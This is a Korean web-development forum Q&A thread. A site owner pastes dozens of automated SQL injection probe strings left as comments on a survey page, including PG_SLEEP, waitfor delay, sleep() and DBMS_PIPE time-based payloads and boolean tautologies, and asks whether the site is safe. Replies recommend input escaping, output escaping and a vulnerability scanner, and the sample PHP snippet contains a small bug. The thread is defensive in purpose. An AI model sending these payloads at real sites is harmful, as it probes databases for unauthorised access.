디비인젝션 공격

매출이 오르면 내리는 수수료! 지금 수수료센터에서 전자결제(PG)수수료 비교견적 신청해 보세요!
디비인젝션 공격

QA

디비인젝션 공격

본문

G MBWUpmEH  2023-07-23 04:59:21삭제
@@RRTki
G MBWUpmEH  2023-07-23 04:59:20삭제
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
G MBWUpmEH  2023-07-23 04:59:12삭제
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
G MBWUpmEH  2023-07-23 04:59:01삭제
mgXUgM0m')) OR 319=(SELECT 319 FROM PG_SLEEP(15))--
G MBWUpmEH  2023-07-23 04:58:45삭제
l21MgpwA') OR 673=(SELECT 673 FROM PG_SLEEP(15))--
G MBWUpmEH  2023-07-23 04:58:31삭제
3myT6qQC' OR 876=(SELECT 876 FROM PG_SLEEP(15))--
G MBWUpmEH  2023-07-23 04:58:20삭제
-1)) OR 430=(SELECT 430 FROM PG_SLEEP(15))--
G MBWUpmEH  2023-07-23 04:58:08삭제
-5) OR 243=(SELECT 243 FROM PG_SLEEP(15))--
G MBWUpmEH  2023-07-23 04:57:30삭제
-5 OR 393=(SELECT 393 FROM PG_SLEEP(15))--
G MBWUpmEH  2023-07-23 04:57:04삭제
jLC93o12'; waitfor delay '0:0:15' --
G MBWUpmEH  2023-07-23 04:56:40삭제
1 waitfor delay '0:0:15' --
G MBWUpmEH  2023-07-23 04:56:13삭제
-1); waitfor delay '0:0:15' --
G MBWUpmEH  2023-07-23 04:55:55삭제
-1; waitfor delay '0:0:15' --
G MBWUpmEH  2023-07-23 04:55:37삭제
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
G MBWUpmEH  2023-07-23 04:55:18삭제
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
G MBWUpmEH  2023-07-23 04:54:58삭제
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
G MBWUpmEH  2023-07-23 04:54:40삭제
if(now()=sysdate(),sleep(15),0)
G MBWUpmEH  2023-07-23 04:54:24삭제
-1" OR 2+462-462-1=0+0+0+1 --
G MBWUpmEH  2023-07-23 04:54:24삭제
-1' OR 2+276-276-1=0+0+0+1 or 'eI1jHuYI'='
G MBWUpmEH  2023-07-23 04:54:24삭제
-1' OR 2+493-493-1=0+0+0+1 --
G MBWUpmEH  2023-07-23 04:54:23삭제
-1 OR 2+537-537-1=0+0+0+1
G MBWUpmEH  2023-07-23 04:54:23삭제
-1 OR 2+650-650-1=0+0+0+1 --

 

----------------------------

 

설문조사를 오픈했놨더니 댓글에 이런 메세지가 가득하네요.. 

인젝션 공격이라는데... 패치 잘 되어 있으면 문제 없는 거죠...?

 

ㅠ.ㅠ

이 질문에 댓글 쓰기 :

답변 3

SQL 인젝션인데 댓글에 그대로 INSERT 된 것을 보면 문제는 없을 가능성이 있구요.

댓글 입력 처리에 mysqli_real_escape_string(); 을 사용하고

혹시 모르니 사용자 댓글 출력 시 이스케이프 처리도 필요할 것 같습니다.

 


// 사용자 입력을 필터링하여 적절한 형식인지 확인
$comment = $_POST['comment'];
$comment = filter_var($comment, FILTER_SANITIZE_STRING);
 
// 데이터베이스로부터 가져온 변수 출력 시 HTML 이스케이프 적용
echo htmlspecialchars(comment, ENT_QUOTES, 'UTF-8');

Accunetix 와 같은 전용 웹 공격 테스트 환경을 구축하고 테스트해보셔야 합니다.

Acunetix는 보통 10만개 이상의 공격패턴으로 공격하여 그 결과에 따라 위험도를 등급으로 표식하고, 그 해결방도를 제안해줍니다.

구체적인 내용을 알고싶으시면, 연계주세요.

위의 패턴은 이스케이프 조치만 하면 해결되는 거라서
현 상황에 Accunetix는 필요 없다고 생각됩니다.

그리고 댓글은 유료 의뢰에 해당하는 느낌을 지울 수 없네요.
QA에 맞는 내용을 적어주시기 바랍니다.

답변을 작성하시기 전에 로그인 해주세요.
전체 47
QA 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT